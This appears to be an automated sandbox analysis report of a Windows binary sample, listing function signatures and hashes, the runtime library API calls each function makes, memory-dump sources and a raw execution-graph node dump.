                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                • String ID: ieB
                                • API String ID: 4063778783-941594339
                                • Opcode ID: 328c220b32d40f171b15634ce83f9b634308f59b7d92a067a936f59f01f4bf3f
                                • Instruction ID: ce9e8872aa3521b847ada45dcded9d4a69b10e2cd2495da4b5261623828ab12f
                                • Opcode Fuzzy Hash: 328c220b32d40f171b15634ce83f9b634308f59b7d92a067a936f59f01f4bf3f
                                • Instruction Fuzzy Hash: 0CE065B091021E56DB14FBE8BE557FFB3A8AB44314F400A5EE81552281FB7496188596
                                Function 00564C33 Relevance: 5.0, APIs: 4, Instructions: 38COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(0073B1D0,?,?,?,?,0054D79D,00000010,00000008,00544598,0054452F,005381E4,005382F8,0040E0F1), ref: 00564C6D
                                • InitializeCriticalSection.KERNEL32(-0073B038,?,?,?,?,0054D79D,00000010,00000008,00544598,0054452F,005381E4,005382F8,0040E0F1), ref: 00564C7F
                                • LeaveCriticalSection.KERNEL32(0073B1D0,?,?,?,?,0054D79D,00000010,00000008,00544598,0054452F,005381E4,005382F8,0040E0F1), ref: 00564C8C
                                • EnterCriticalSection.KERNEL32(-0073B038,?,?,?,?,0054D79D,00000010,00000008,00544598,0054452F,005381E4,005382F8,0040E0F1), ref: 00564C9C
                                  • Part of subcall function 005381C8: __CxxThrowException@8.LIBCMT ref: 005381DE
                                  • Part of subcall function 005381C8: __EH_prolog3.LIBCMT ref: 005381EB
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                • String ID:
                                • API String ID: 2895727460-0
                                • Opcode ID: 19adabfb396c4316b86e330d61b6d73c0d74e3d871021e71914355271bbf5929
                                • Instruction ID: 2e2847c5477703053a214fc31ff6fa624893beb1846d2c6b0b1de47cfd329d3d
                                • Opcode Fuzzy Hash: 19adabfb396c4316b86e330d61b6d73c0d74e3d871021e71914355271bbf5929
                                • Instruction Fuzzy Hash: C9F0C273202209AFEB141B94DD9DB29BA6AFBE1351F412125E20453152DB748941CEA5
                                Function 0054D716 Relevance: 5.0, APIs: 4, Instructions: 35COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(0073A27C,?,?,?,?,0054DCC2,?,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D724
                                • TlsGetValue.KERNEL32(0073A260,?,?,?,?,0054DCC2,?,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D738
                                • LeaveCriticalSection.KERNEL32(0073A27C,?,?,?,?,0054DCC2,?,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D74E
                                • LeaveCriticalSection.KERNEL32(0073A27C,?,?,?,?,0054DCC2,?,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D759
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$EnterValue
                                • String ID:
                                • API String ID: 3969253408-0
                                • Opcode ID: 963ec33397e15d755683d7068fc250333d53209a43c35716d59d7821a6acbce2
                                • Instruction ID: a31ba7790e31959afcdf96f5812570665656670ee15346c31ccdfe3d9740748d
                                • Opcode Fuzzy Hash: 963ec33397e15d755683d7068fc250333d53209a43c35716d59d7821a6acbce2
                                • Instruction Fuzzy Hash: 5EF05E76200205AFC7209F58EC88D9ABBFEFA843A53165926F80697511DA35F805CBF2

                                Execution Graph

                                Execution Coverage:1.6%
                                Dynamic/Decrypted Code Coverage:10.1%
                                Signature Coverage:1.3%
                                Total number of Nodes:823
                                Total number of Limit Nodes:29
                                execution_graph 143961 6c27bca4 143969 6c27bcb0 143961->143969 143962 6c2f1f84 98 API calls _sprintf 143962->143969 143966 6c27bfa9 143989 6c2f1f75 143966->143989 143968 6c27bfb6 143969->143962 143969->143966 143971 6c2c0679 143969->143971 143986 6c290b5b 62 API calls __floor_pentium4 143969->143986 143987 6c316d20 62 API calls 143969->143987 143988 6c2c0847 148 API calls 2 library calls 143969->143988 143972 6c2c06a3 143971->143972 143997 6c2bf7da 143972->143997 143976 6c2c0798 143977 6c2f1f75 __write_nolock 5 API calls 143976->143977 143978 6c2c07c2 143977->143978 143978->143969 143979 6c2c06b7 143979->143976 143980 6c2c072e 143979->143980 143981 6c2c0741 143979->143981 143984 6c2c06fe 143979->143984 144076 6c2bf3fb 101 API calls 3 library calls 143980->144076 144077 6c2c0238 101 API calls 6 library calls 143981->144077 143984->143976 144024 6c2bfaa9 143984->144024 143986->143969 143987->143969 143988->143969 143990 6c2f1f7f IsDebuggerPresent 143989->143990 143991 6c2f1f7d 143989->143991 144523 6c30103d 143990->144523 143991->143968 143994 6c2f5f09 SetUnhandledExceptionFilter UnhandledExceptionFilter 143995 6c2f5f2e GetCurrentProcess TerminateProcess 143994->143995 143996 6c2f5f26 __call_reportfault 143994->143996 143995->143968 143996->143995 143998 6c2bf823 143997->143998 144008 6c2bf81b 143997->144008 143999 6c2bf861 143998->143999 144078 6c2b83bc 143998->144078 143999->144008 144088 6c2f4496 97 API calls 6 library calls 143999->144088 144000 6c2f1f75 __write_nolock 5 API calls 144003 6c2bfaa4 144000->144003 144016 6c2bf2b5 144003->144016 144005 6c2b83bc 144 API calls 144005->143999 144007 6c2bfa57 144103 6c2f4ae0 62 API calls __write_nolock 144007->144103 144008->144000 144013 6c2bf880 __mbschr_l 144013->144007 144013->144008 144014 6c2c8f22 62 API calls 144013->144014 144015 6c2bf33d 65 API calls 144013->144015 144089 6c2bf3fb 101 API calls 3 library calls 144013->144089 144090 6c2f49b0 81 API calls __tolower_l 144013->144090 144091 6c2f1f84 144013->144091 144102 6c2f3007 77 API calls 6 library calls 144013->144102 144014->144013 144015->144013 144020 6c2bf2c8 __mbschr_l _strncpy 144016->144020 144017 6c2bf2f1 144021 6c2bf30f 144017->144021 144426 6c2f49b0 81 API calls __tolower_l 144017->144426 144020->144017 144425 6c2c8f22 62 API calls 3 library calls 144020->144425 144022 6c2bf332 144021->144022 144023 6c2f1f84 _sprintf 98 API calls 144021->144023 144022->143979 144023->144022 144025 6c2bfaeb 144024->144025 144029 6c2bfb88 144025->144029 144435 6c2b6655 62 API calls 2 library calls 144025->144435 144027 6c2bfb40 144031 6c2bfb4e _memset 144027->144031 144436 6c2b13bf 98 API calls 2 library calls 144027->144436 144032 6c2f1f84 _sprintf 98 API calls 144029->144032 144031->144029 144437 6c2f28b7 98 API calls 5 library calls 144031->144437 144033 6c2bfc00 144032->144033 144034 6c2bfd0f 144033->144034 144438 6c2c817c 62 API calls 144033->144438 144036 6c2bfd5a 144034->144036 144441 6c2c5db6 5 API calls __write_nolock 144034->144441 144037 6c2bfde1 144036->144037 144427 6c2b726b 144036->144427 144048 6c2bfdb3 144037->144048 144056 6c2bfe3c 144037->144056 144443 6c2c0e52 145 API calls 144037->144443 144038 6c2bfce2 144439 6c2c4712 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 144038->144439 144043 6c2bfcf9 144440 6c2c4712 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 144043->144440 144044 6c2bfe1b 144044->144048 144444 6c2c0e52 145 API calls 144044->144444 144047 6c2bfd2e 144047->144036 144442 6c2c5c0c 62 API calls __write_nolock 144047->144442 144053 6c2f1f75 __write_nolock 5 API calls 144048->144053 144049 6c2bfffc 144061 6c2c003f 144049->144061 144450 6c2ba73a 5 API calls __write_nolock 144049->144450 144052 6c2b726b 146 API calls 144052->144037 144055 6c2c0236 144053->144055 144054 6c2bff40 144060 6c2bff73 144054->144060 144446 6c2ba96a 5 API calls __write_nolock 144054->144446 144055->143976 144056->144048 144056->144049 144056->144054 144445 6c2babd5 5 API calls __write_nolock 144056->144445 144072 6c2bffaf 144060->144072 144447 6c2c5c0c 62 API calls __write_nolock 144060->144447 144063 6c2c00fc 144061->144063 144064 6c2c012f 144061->144064 144075 6c2c010f 144061->144075 144451 6c2b9dc8 145 API calls __write_nolock 144063->144451 144069 6c2c0149 144064->144069 144070 6c2c0136 144064->144070 144068 6c2bffda 144068->144049 144449 6c2ba5e7 62 API calls 144068->144449 144453 6c2c2e6b 62 API calls __write_nolock 144069->144453 144452 6c2b9ef2 145 API calls __write_nolock 144070->144452 144072->144049 144448 6c2c4712 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 144072->144448 144075->144048 144454 6c2c2e6b 62 API calls __write_nolock 144075->144454 144076->143984 144077->143984 144079 6c2b83f0 144078->144079 144080 6c2b8575 144079->144080 144082 6c2b8592 144079->144082 144085 6c2b85ca 144079->144085 144104 6c2f24fa 144079->144104 144081 6c2f1f84 _sprintf 98 API calls 144080->144081 144081->144082 144083 6c2f1f75 __write_nolock 5 API calls 144082->144083 144084 6c2b85c8 144083->144084 144084->143999 144084->144005 144085->144082 144086 6c2f1f84 _sprintf 98 API calls 144085->144086 144086->144082 144088->144013 144089->144013 144090->144013 144092 6c2f1fb7 144091->144092 144093 6c2f1fa2 144091->144093 144092->144093 144095 6c2f1fbe 144092->144095 144421 6c2f6fbc 62 API calls __getptd_noexit 144093->144421 144423 6c2f61ad 98 API calls 12 library calls 144095->144423 144096 6c2f1fa7 144422 6c2f6f31 10 API calls __invalid_parameter_noinfo_noreturn 144096->144422 144099 6c2f1fe4 144100 6c2f1fb2 144099->144100 144424 6c2f5f42 93 API calls 6 library calls 144099->144424 144100->144013 144102->144013 144103->144008 144107 6c2f243e 144104->144107 144106 6c2f250c 144106->144079 144110 6c2f244a __getstream 144107->144110 144108 6c2f245d 144166 6c2f6fbc 62 API calls __getptd_noexit 144108->144166 144110->144108 144112 6c2f248a 144110->144112 144111 6c2f2462 144167 6c2f6f31 10 API calls __invalid_parameter_noinfo_noreturn 144111->144167 144126 6c2f8289 144112->144126 144115 6c2f248f 144116 6c2f2496 144115->144116 144117 6c2f24a3 144115->144117 144168 6c2f6fbc 62 API calls __getptd_noexit 144116->144168 144119 6c2f24ca 144117->144119 144120 6c2f24aa 144117->144120 144144 6c2f7ff2 144119->144144 144169 6c2f6fbc 62 API calls __getptd_noexit 144120->144169 144121 6c2f246d @_EH4_CallFilterFunc@8 __getstream 144121->144106 144127 6c2f8295 __getstream 144126->144127 144171 6c2f7fbf 144127->144171 144129 6c2f8318 144178 6c2f83b3 144129->144178 144130 6c2f831f 144211 6c2f7a7a 62 API calls _malloc 144130->144211 144133 6c2f8326 144133->144129 144135 6c2f8334 InitializeCriticalSectionAndSpinCount 144133->144135 144134 6c2f83a8 __getstream 144134->144115 144136 6c2f8367 EnterCriticalSection 144135->144136 144137 6c2f8354 144135->144137 144136->144129 144212 6c2f355f 62 API calls 2 library calls 144137->144212 144141 6c2f82a3 144141->144129 144141->144130 144181 6c2f7efd 144141->144181 144209 6c2f23a1 63 API calls __lock 144141->144209 144210 6c2f240f LeaveCriticalSection LeaveCriticalSection __wdupenv_s 144141->144210 144142 6c2f835c 144142->144129 144146 6c2f8014 144144->144146 144145 6c2f803f 144151 6c2f8230 144145->144151 144165 6c2f81dc 144145->144165 144229 6c304a44 72 API calls __fassign 144145->144229 144146->144145 144147 6c2f8028 144146->144147 144227 6c2f6fbc 62 API calls __getptd_noexit 144147->144227 144149 6c2f802d 144228 6c2f6f31 10 API calls __invalid_parameter_noinfo_noreturn 144149->144228 144150 6c2f8242 144224 6c3046ba 144150->144224 144233 6c2f6fbc 62 API calls __getptd_noexit 144151->144233 144155 6c2f8235 144234 6c2f6f31 10 API calls __invalid_parameter_noinfo_noreturn 144155->144234 144156 6c2f24d5 144170 6c2f24f0 LeaveCriticalSection LeaveCriticalSection __fseeki64 144156->144170 144159 6c2f81ab 144159->144151 144230 6c3048de 81 API calls __mbsnbicmp_l 144159->144230 144161 6c2f81d5 144161->144165 144231 6c3048de 81 API calls __mbsnbicmp_l 144161->144231 144163 6c2f81f4 144163->144165 144232 6c3048de 81 API calls __mbsnbicmp_l 144163->144232 144165->144150 144165->144151 144166->144111 144167->144121 144168->144121 144169->144121 144170->144121 144172 6c2f7fe7 EnterCriticalSection 144171->144172 144173 6c2f7fd4 144171->144173 144172->144141 144174 6c2f7efd __mtinitlocknum 61 API calls 144173->144174 144175 6c2f7fda 144174->144175 144175->144172 144213 6c2f2e7d 62 API calls 3 library calls 144175->144213 144214 6c2f7ece LeaveCriticalSection 144178->144214 144180 6c2f83ba 144180->144134 144182 6c2f7f09 __getstream 144181->144182 144183 6c2f7f19 144182->144183 144184 6c2f7f31 144182->144184 144215 6c2fb831 62 API calls 2 library calls 144183->144215 144186 6c2f7f2f 144184->144186 144193 6c2f7f3f __getstream 144184->144193 144186->144184 144218 6c2f7a7a 62 API calls _malloc 144186->144218 144187 6c2f7f1e 144216 6c2fb682 62 API calls 7 library calls 144187->144216 144189 6c2f7f4a 144191 6c2f7f51 144189->144191 144192 6c2f7f60 144189->144192 144219 6c2f6fbc 62 API calls __getptd_noexit 144191->144219 144196 6c2f7fbf __lock 61 API calls 144192->144196 144193->144141 144194 6c2f7f25 144217 6c2f2b5e GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 144194->144217 144199 6c2f7f67 144196->144199 144198 6c2f7f56 144198->144193 144200 6c2f7f6f InitializeCriticalSectionAndSpinCount 144199->144200 144201 6c2f7f9a 144199->144201 144202 6c2f7f7f 144200->144202 144203 6c2f7f8b 144200->144203 144222 6c2f355f 62 API calls 2 library calls 144201->144222 144220 6c2f355f 62 API calls 2 library calls 144202->144220 144223 6c2f7fb6 LeaveCriticalSection __wdupenv_s 144203->144223 144207 6c2f7f85 144221 6c2f6fbc 62 API calls __getptd_noexit 144207->144221 144209->144141 144210->144141 144211->144133 144212->144142 144214->144180 144215->144187 144216->144194 144218->144189 144219->144198 144220->144207 144221->144203 144222->144203 144223->144198 144235 6c3045c4 144224->144235 144226 6c3046d5 144226->144156 144227->144149 144228->144156 144229->144159 144230->144161 144231->144163 144232->144165 144233->144155 144234->144156 144236 6c3045d0 __getstream 144235->144236 144237 6c3045e3 144236->144237 144239 6c304619 144236->144239 144355 6c2f6fbc 62 API calls __getptd_noexit 144237->144355 144246 6c303de2 144239->144246 144240 6c3045e8 144356 6c2f6f31 10 API calls __invalid_parameter_noinfo_noreturn 144240->144356 144243 6c304633 144357 6c30465a LeaveCriticalSection __unlock_fhandle 144243->144357 144245 6c3045f2 __getstream 144245->144226 144247 6c303e09 144246->144247 144358 6c3130ed 144247->144358 144250 6c304515 __getstream 144253 6c304537 144250->144253 144254 6c30454c 144250->144254 144251 6c303e64 144384 6c2f6fcf 62 API calls __getptd_noexit 144251->144384 144417 6c2f6fbc 62 API calls __getptd_noexit 144253->144417 144256 6c303de2 __tsopen_nolock 116 API calls 144254->144256 144255 6c303e69 144385 6c2f6fbc 62 API calls __getptd_noexit 144255->144385 144260 6c304566 144256->144260 144258 6c303e25 144258->144251 144264 6c303ebf 144258->144264 144309 6c304094 144258->144309 144419 6c30458a LeaveCriticalSection __unlock_fhandle 144260->144419 144261 6c30453c 144418 6c2f6f31 10 API calls __invalid_parameter_noinfo_noreturn 144261->144418 144262 6c303e73 144386 6c2f6f31 10 API calls __invalid_parameter_noinfo_noreturn 144262->144386 144266 6c303f46 144264->144266 144274 6c303f19 144264->144274 144387 6c2f6fcf 62 API calls __getptd_noexit 144266->144387 144268 6c304578 144273 6c304547 __getstream 144268->144273 144420 6c2f6fbc 62 API calls __getptd_noexit 144268->144420 144270 6c303f4b 144388 6c2f6fbc 62 API calls __getptd_noexit 144270->144388 144273->144243 144365 6c30dd1c 144274->144365 144275 6c303f55 144389 6c2f6f31 10 API calls __invalid_parameter_noinfo_noreturn 144275->144389 144278 6c303e7d 144278->144243 144279 6c303fd7 144280 6c303fe0 144279->144280 144281 6c304001 CreateFileA 144279->144281 144390 6c2f6fcf 62 API calls __getptd_noexit 144280->144390 144282 6c30409e GetFileType 144281->144282 144283 6c30402e 144281->144283 144287 6c3040ab GetLastError 144282->144287 144288 6c3040ef 144282->144288 144285 6c304067 GetLastError 144283->144285 144286 6c30403c 144283->144286 144393 6c2f6fe2 62 API calls 2 library calls 144285->144393 144286->144285 144290 6c304042 CreateFileA 144286->144290 144395 6c2f6fe2 62 API calls 2 library calls 144287->144395 144397 6c30dae6 63 API calls __write_nolock 144288->144397 144289 6c303fe5 144391 6c2f6fbc 62 API calls __getptd_noexit 144289->144391 144290->144282 144290->144285 144294 6c3040d4 CloseHandle 144296 6c3040e2 144294->144296 144302 6c30408e 144294->144302 144295 6c303fef 144392 6c2f6fbc 62 API calls __getptd_noexit 144295->144392 144396 6c2f6fbc 62 API calls __getptd_noexit 144296->144396 144300 6c30410d 144303 6c304163 144300->144303 144313 6c3041d2 144300->144313 144351 6c304401 144300->144351 144394 6c2f6fbc 62 API calls __getptd_noexit 144302->144394 144398 6c2fee2a 64 API calls 3 library calls 144303->144398 144304 6c304323 144306 6c30448b CloseHandle CreateFileA 144304->144306 144304->144309 144304->144351 144308 6c3044b8 GetLastError 144306->144308 144306->144309 144307 6c30416d 144310 6c304176 144307->144310 144311 6c30418f 144307->144311 144414 6c2f6fe2 62 API calls 2 library calls 144308->144414 144416 6c2f6ec5 10 API calls __call_reportfault 144309->144416 144399 6c2f6fcf 62 API calls __getptd_noexit 144310->144399 144401 6c2fe68d 72 API calls 5 library calls 144311->144401 144318 6c30432c 144313->144318 144327 6c30427c 144313->144327 144313->144351 144316 6c3044c4 144415 6c30db67 63 API calls __write_nolock 144316->144415 144317 6c30417b 144317->144313 144321 6c304183 144317->144321 144329 6c304349 144318->144329 144331 6c3042a0 144318->144331 144318->144351 144319 6c3041a0 144323 6c3041b9 144319->144323 144402 6c312d37 96 API calls 4 library calls 144319->144402 144400 6c2fa7e8 65 API calls 3 library calls 144321->144400 144322 6c3042e7 144322->144321 144406 6c2fe68d 72 API calls 5 library calls 144322->144406 144323->144321 144403 6c2fee2a 64 API calls 3 library calls 144323->144403 144327->144322 144327->144331 144332 6c3042cb 144327->144332 144327->144351 144407 6c300403 64 API calls 3 library calls 144329->144407 144331->144321 144331->144351 144413 6c301742 93 API calls 4 library calls 144331->144413 144404 6c300403 64 API calls 3 library calls 144332->144404 144333 6c304354 144333->144331 144340 6c30435f 144333->144340 144335 6c3043a4 144337 6c3043c6 144335->144337 144342 6c3043ab 144335->144342 144336 6c30438a 144409 6c2fa7e8 65 API calls 3 library calls 144336->144409 144412 6c2fee2a 64 API calls 3 library calls 144337->144412 144338 6c304301 144338->144304 144338->144321 144338->144335 144338->144336 144338->144337 144408 6c300403 64 API calls 3 library calls 144340->144408 144411 6c2fee2a 64 API calls 3 library calls 144342->144411 144343 6c3042d6 144343->144331 144349 6c3042dd 144343->144349 144346 6c304369 144346->144321 144346->144351 144347 6c304391 144410 6c2f6fbc 62 API calls __getptd_noexit 144347->144410 144405 6c300403 64 API calls 3 library calls 144349->144405 144351->144304 144351->144309 144353 6c3043b5 144353->144304 144353->144321 144355->144240 144356->144245 144357->144245 144359 6c3130f9 144358->144359 144360 6c31310e 144358->144360 144361 6c2f6fbc __write_nolock 62 API calls 144359->144361 144360->144258 144362 6c3130fe 144361->144362 144363 6c2f6f31 __write_nolock 10 API calls 144362->144363 144364 6c313109 144363->144364 144364->144258 144366 6c30dd28 __getstream 144365->144366 144367 6c2f7efd __mtinitlocknum 62 API calls 144366->144367 144368 6c30dd38 144367->144368 144369 6c2f7fbf __lock 62 API calls 144368->144369 144370 6c30dd3d __getstream 144368->144370 144380 6c30dd4c 144369->144380 144370->144279 144371 6c30de97 144373 6c30deac __alloc_osfhnd LeaveCriticalSection 144371->144373 144372 6c30de24 144374 6c2f7abf __calloc_crt 62 API calls 144372->144374 144373->144370 144377 6c30de2d 144374->144377 144375 6c2f7fbf __lock 62 API calls 144375->144380 144376 6c30ddcc EnterCriticalSection 144378 6c30dddc LeaveCriticalSection 144376->144378 144376->144380 144377->144371 144381 6c30dc56 ___lock_fhandle 64 API calls 144377->144381 144378->144380 144379 6c30dda2 InitializeCriticalSectionAndSpinCount 144379->144380 144380->144371 144380->144372 144380->144375 144380->144376 144380->144379 144382 6c30ddee __alloc_osfhnd LeaveCriticalSection 144380->144382 144383 6c30de8e 144381->144383 144382->144380 144383->144371 144384->144255 144385->144262 144386->144278 144387->144270 144388->144275 144389->144278 144390->144289 144391->144295 144392->144278 144393->144302 144394->144309 144395->144294 144396->144302 144397->144300 144398->144307 144399->144317 144400->144302 144401->144319 144402->144323 144403->144317 144404->144343 144405->144322 144406->144338 144407->144333 144408->144346 144409->144347 144410->144309 144411->144353 144412->144346 144413->144331 144414->144316 144415->144309 144416->144250 144417->144261 144418->144273 144419->144268 144420->144273 144421->144096 144422->144100 144423->144099 144424->144100 144425->144020 144426->144017 144428 6c2b7287 144427->144428 144433 6c2b7273 144427->144433 144469 6c2b7969 146 API calls __write_nolock 144428->144469 144432 6c2b7282 144432->144048 144432->144052 144433->144432 144434 6c2b727a 144433->144434 144455 6c2b7458 144433->144455 144434->144432 144470 6c2b3d23 98 API calls 2 library calls 144434->144470 144435->144027 144436->144031 144437->144031 144438->144038 144439->144043 144440->144034 144441->144047 144442->144036 144443->144044 144444->144056 144445->144054 144446->144060 144447->144072 144448->144068 144449->144049 144450->144061 144451->144075 144452->144075 144453->144075 144454->144048 144456 6c2b74c5 144455->144456 144458 6c2b75ca 144456->144458 144471 6c2b7cc1 144456->144471 144459 6c2b7cc1 145 API calls 144458->144459 144461 6c2b766f 144458->144461 144466 6c2b76b9 144458->144466 144468 6c2b76b1 144459->144468 144460 6c2b7cc1 145 API calls 144467 6c2b7788 144460->144467 144461->144460 144461->144466 144461->144467 144462 6c2f1f75 __write_nolock 5 API calls 144463 6c2b7967 144462->144463 144463->144434 144464 6c2b7cc1 145 API calls 144464->144466 144466->144462 144467->144464 144467->144466 144468->144461 144468->144466 144503 6c2b157b 98 API calls 2 library calls 144468->144503 144469->144433 144470->144432 144473 6c2b7d11 144471->144473 144472 6c2b7e10 144499 6c2b7f8b 144472->144499 144504 6c2c7866 144472->144504 144473->144472 144502 6c2b7d86 144473->144502 144516 6c2f28b7 98 API calls 5 library calls 144473->144516 144476 6c2b7fbd 144491 6c2b8010 144476->144491 144520 6c2bbdd0 113 API calls 7 library calls 144476->144520 144477 6c2b7de6 144478 6c2b7dfb 144477->144478 144517 6c2f355f 62 API calls 2 library calls 144477->144517 144478->144472 144518 6c2f355f 62 API calls 2 library calls 144478->144518 144479 6c2f1f75 __write_nolock 5 API calls 144482 6c2b83ba 144479->144482 144482->144458 144484 6c2b7ff4 144484->144491 144484->144502 144521 6c2bd28e 5 API calls __write_nolock 144484->144521 144485 6c2b8237 __cftoa_l 144488 6c2b82bd 144485->144488 144489 6c2b826a 144485->144489 144485->144502 144486 6c2b7e3c __mbschr_l __cftoa_l _strncmp 144493 6c2b83bc 144 API calls 144486->144493 144495 6c2b7f78 144486->144495 144500 6c2c8f22 62 API calls 144486->144500 144501 6c2f1f84 _sprintf 98 API calls 144486->144501 144486->144502 144492 6c2f1f84 _sprintf 98 API calls 144488->144492 144490 6c2f1f84 _sprintf 98 API calls 144489->144490 144494 6c2b82b8 144490->144494 144498 6c2b7cc1 145 API calls 144491->144498 144491->144502 144492->144494 144493->144486 144496 6c2f1f84 _sprintf 98 API calls 144494->144496 144519 6c2bc4dc 122 API calls 14 library calls 144495->144519 144496->144502 144498->144502 144499->144476 144499->144485 144499->144502 144500->144486 144501->144486 144502->144479 144503->144461 144508 6c2c7895 144504->144508 144509 6c2c7877 144504->144509 144505 6c2c789c 144506 6c2c78ca 144505->144506 144507 6c2c78aa 144505->144507 144512 6c2f1f84 _sprintf 98 API calls 144506->144512 144510 6c2f1f84 _sprintf 98 API calls 144507->144510 144522 6c2a86d4 62 API calls __floor_pentium4 144508->144522 144509->144505 144509->144508 144515 6c2c78c2 144510->144515 144512->144515 144513 6c2c7948 144514 6c2f1f84 _sprintf 98 API calls 144513->144514 144514->144515 144515->144486 144516->144477 144517->144478 144518->144472 144519->144499 144520->144484 144521->144491 144522->144513 144523->143994 144524 6c271112 144525 6c2f24fa 139 API calls 144524->144525 144526 6c271118 144525->144526 144527 6c2f1f84 _sprintf 98 API calls 144526->144527 144532 6c271144 __flsbuf 144526->144532 144528 6c271138 144527->144528 144562 6c291814 99 API calls 2 library calls 144528->144562 144531 6c2711a6 144564 6c2914fc 112 API calls 4 library calls 144531->144564 144532->144531 144556 6c2711ca _memset 144532->144556 144563 6c2914fc 112 API calls 4 library calls 144532->144563 144535 6c2711b0 144536 6c2711c0 144535->144536 144565 6c2914fc 112 API calls 4 library calls 144535->144565 144566 6c2914fc 112 API calls 4 library calls 144536->144566 144540 6c271433 144541 6c271467 144540->144541 144574 6c2914fc 112 API calls 4 library calls 144540->144574 144550 6c27147a __flsbuf 144541->144550 144577 6c294c0a 146 API calls 5 library calls 144541->144577 144542 6c2914fc 112 API calls 144542->144556 144545 6c27144d 144547 6c27145d 144545->144547 144575 6c2914fc 112 API calls 4 library calls 144545->144575 144576 6c2914fc 112 API calls 4 library calls 144547->144576 144549 6c271491 144555 6c2f1f75 __write_nolock 5 API calls 144549->144555 144550->144549 144578 6c2f28b7 98 API calls 5 library calls 144550->144578 144557 6c2714a0 144555->144557 144556->144540 144556->144542 144559 6c291ad3 113 API calls 144556->144559 144561 6c29070e 103 API calls 144556->144561 144567 6c2714a4 146 API calls 3 library calls 144556->144567 144568 6c27f780 164 API calls 144556->144568 144569 6c277259 62 API calls __floor_pentium4 144556->144569 144570 6c277313 62 API calls 144556->144570 144571 6c286e7c 147 API calls 3 library calls 144556->144571 144572 6c2f174a 257 API calls 144556->144572 144573 6c285698 224 API calls 144556->144573 144559->144556 144561->144556 144562->144532 144563->144531 144564->144535 144565->144536 144566->144556 144567->144556 144568->144556 144569->144556 144570->144556 144571->144556 144572->144556 144573->144556 144574->144545 144575->144547 144576->144541 144577->144550 144578->144549 144579 6c2b6993 144580 6c2b6998 144579->144580 144581 6c2f1f75 __write_nolock 5 API calls 144580->144581 144582 6c2b6ab9 144581->144582 144583 6c27b1de 144584 6c27b1ed 144583->144584 144585 6c2f1f84 _sprintf 98 API calls 144584->144585 144586 6c27b1fa 144585->144586 144587 6c2f1f84 _sprintf 98 API calls 144586->144587 144588 6c27b21d 144587->144588 144605 6c2f330e 144588->144605 144590 6c27b275 144591 6c2f330e __wgetenv 95 API calls 144590->144591 144596 6c27b282 144591->144596 144592 6c27b250 144592->144590 144595 6c2f1f84 _sprintf 98 API calls 144592->144595 144593 6c27b2a7 144594 6c2f330e __wgetenv 95 API calls 144593->144594 144599 6c27b2b0 144594->144599 144595->144590 144596->144593 144598 6c2f1f84 _sprintf 98 API calls 144596->144598 144597 6c27b2d5 144600 6c2f1f84 _sprintf 98 API calls 144597->144600 144598->144593 144599->144597 144602 6c2f1f84 _sprintf 98 API calls 144599->144602 144601 6c27b2f7 144600->144601 144603 6c2f1f75 __write_nolock 5 API calls 144601->144603 144602->144597 144604 6c27b31c 144603->144604 144607 6c2f331a _strnlen __getstream 144605->144607 144606 6c2f3326 144618 6c2f6fbc 62 API calls __getptd_noexit 144606->144618 144607->144606 144611 6c2f3352 144607->144611 144609 6c2f332b 144619 6c2f6f31 10 API calls __invalid_parameter_noinfo_noreturn 144609->144619 144612 6c2f7fbf __lock 62 API calls 144611->144612 144613 6c2f3359 144612->144613 144620 6c2f3160 95 API calls 3 library calls 144613->144620 144615 6c2f3336 __getstream 144615->144592 144616 6c2f3366 144621 6c2f337f LeaveCriticalSection __wdupenv_s 144616->144621 144618->144609 144619->144615 144620->144616 144621->144615 144622 6c2f5d24 144623 